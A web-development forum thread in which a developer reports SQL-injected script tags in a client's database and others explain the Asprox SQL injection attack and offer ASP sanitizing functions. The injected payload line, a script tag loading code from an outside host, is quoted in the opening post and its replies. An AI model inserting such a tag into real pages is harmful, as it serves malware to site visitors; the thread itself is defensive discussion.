Hi all
A client of mine is having a problem with their site and when I looked
into the SQL database, I found that most text fields have been altered
and appended with
script src=http://www.westpacsecuresite.com/b.js/script
I've taken out the < so that this shows.
Has anyone seen this? I've seen other sites on the net when I did a
google search. http://www.google.com/search?q=%3Csc...e7&rlz=1I7GGLJ
Has my server been hacked? Any one seen this?
Thanks 8 3997
<mi*****@lonelyprogrammer.comwrote in message
news:bc**********************************@m45g2000 hsb.googlegroups.com...
Hi all
A client of mine is having a problem with their site and when I looked
into the SQL database, I found that most text fields have been altered
and appended with
script src=http://www.westpacsecuresite.com/b.js/script
I've taken out the < so that this shows.
Has anyone seen this? I've seen other sites on the net when I did a
google search.
http://www.google.com/search?q=%3Csc...e7&rlz=1I7GGLJ
Has my server been hacked? Any one seen this?
Thanks
Yes, it's a SQL Injection attack that is intended to run scripts on the
computer of anyone who visits your client's site, which download a Trojan
called Asprox. This is nearly always the result of poor programming
practice - failure to validate user input, use parameters and/or HTMLEncode
any user supplied values that are written to a web page.
--
Mike Brind
Microsot MVP - ASP/ASP.NET
Yep, you've received a nice SQL Injection attack.
So now you get to go through all your pages and find all the places where
you are accepting Request.QueryString and Request.Form values and start both
validating and sanitizing them.
Tedious and time consuming, but pretty easy. Just need to create some
sanitizing functions that you use all over the place.
I tend to use ones like this:
<%
Function SQLString( txt )
SQLString = "'" & Replace( txt, "'", "''" ) & "'"
End Function
Function SQLDate( dt )
If IsDate(dt) Then
dt = CDate(dt)
SQLDate = "'" & dt & "'"
Else
SQLDate = "NULL"
End If
End Function
Function SQLNumber( num )
If IsNumeric( num ) Then
SQLNumber = CSTR( CDBL( num ) )
Else
SQLNumber = "NULL"
End If
End Function
%>
And then you replace all your unprotected queries, such as
SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
with
SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " &
SQLNumber(id)
And so on.
Oh, yeah...and as Mike poointed out, even all that won't protect you from
people putting <SCRIPTtags, etc., into (say) <TEXTAREAinput.
So unless you *NEED* to allow HTML in some text fields, use a regular
expression to strip it all out.
Hi...
Is there a way for people to be able to get all the table names in your
database using SQL Injection Attacks?
I'm asking since the attacker was able to add SCRIPT tags to tables that
aren't really even used on pages any more.
Thoughts?
Thanks
MU
"Old Pedant" wrote:
Yep, you've received a nice SQL Injection attack.
So now you get to go through all your pages and find all the places where
you are accepting Request.QueryString and Request.Form values and start both
validating and sanitizing them.
Tedious and time consuming, but pretty easy. Just need to create some
sanitizing functions that you use all over the place.
I tend to use ones like this:
<%
Function SQLString( txt )
SQLString = "'" & Replace( txt, "'", "''" ) & "'"
End Function
Function SQLDate( dt )
If IsDate(dt) Then
dt = CDate(dt)
SQLDate = "'" & dt & "'"
Else
SQLDate = "NULL"
End If
End Function
Function SQLNumber( num )
If IsNumeric( num ) Then
SQLNumber = CSTR( CDBL( num ) )
Else
SQLNumber = "NULL"
End If
End Function
%>
And then you replace all your unprotected queries, such as
SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
with
SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " &
SQLNumber(id)
And so on.
Yes, it is possible. Grab a coffee: http://www.ngssoftware.com/papers/ad..._injection.pdf
--
Mike Brind
MVP - ASP/ASP.NET
"MU" <MU@discussions.microsoft.comwrote in message
news:54**********************************@microsof t.com...
Hi...
Is there a way for people to be able to get all the table names in your
database using SQL Injection Attacks?
I'm asking since the attacker was able to add SCRIPT tags to tables that
aren't really even used on pages any more.
Thoughts?
Thanks
MU
"Old Pedant" wrote:
>Yep, you've received a nice SQL Injection attack.
So now you get to go through all your pages and find all the places where you are accepting Request.QueryString and Request.Form values and start both validating and sanitizing them.
Tedious and time consuming, but pretty easy. Just need to create some sanitizing functions that you use all over the place.
I tend to use ones like this:
<% Function SQLString( txt ) SQLString = "'" & Replace( txt, "'", "''" ) & "'" End Function Function SQLDate( dt ) If IsDate(dt) Then dt = CDate(dt) SQLDate = "'" & dt & "'" Else SQLDate = "NULL" End If End Function Function SQLNumber( num ) If IsNumeric( num ) Then SQLNumber = CSTR( CDBL( num ) ) Else SQLNumber = "NULL" End If End Function %>
And then you replace all your unprotected queries, such as SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id with SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " & SQLNumber(id)
And so on.
This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics |
by: Donald Firesmith |
last post by:
I am having trouble having Google Adsense code stored in XSL converted
properly into HTML. The <> unfortunately become < and > and then
no longer work.
XSL code is:
<script...
|
by: Madhav |
last post by:
I have the following statements in my script.
----------------------------------------------------------
textToWrite = "<HTML> \n" +
"<HEAD> \n" +
"<TITLE>Calendar</TITLE> \n" +
"<SCRIPT...
|
by: Blue® |
last post by:
I would like to call the content of content.htm (containing only HTML
codes) into index.htm.
This is usually done by renaming index.htm to index.shtml and use this tag:
<!--#include...
|
by: Grzegorz ¦lusarek |
last post by:
Hello everyone. I1m writing webb aplication using AJAX (prototype
library: http://prototype.conio.net/ and
scriptacuolous:http://script.aculo.us/).
My Problem is that that I'm doing...
|
by: rhythmace |
last post by:
W3C HTML validator passes this:
....
<script type="text/javascript" src="foo.js">
<script type="text/javascript">
....script in here...
</script>
....
| |
by: JOsh Josh |
last post by:
How do i convert my HTML to a CSS format...i put this image sequence togther in HTML but i want to be able to post it right...but i dont know how to go about doing that. Some one please help
...
|
by: phpmel |
last post by:
Hi guys,
I have yet another question. I am working with this html form that uses a template.
<head> //is greyed out
//some greyed out <style >stuff is next
<!-- InstanceEndEditable...
|
by: joe |
last post by:
Is it OK to have multiple:
<script type="text/javascript" src="funcs1.js"></script>
<script type="text/javascript" src="funcs2.js"></script>
<script type="text/javascript"...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers,...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
| |
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing,...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The...
|
by: adsilva |
last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated ...
|
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence...
| |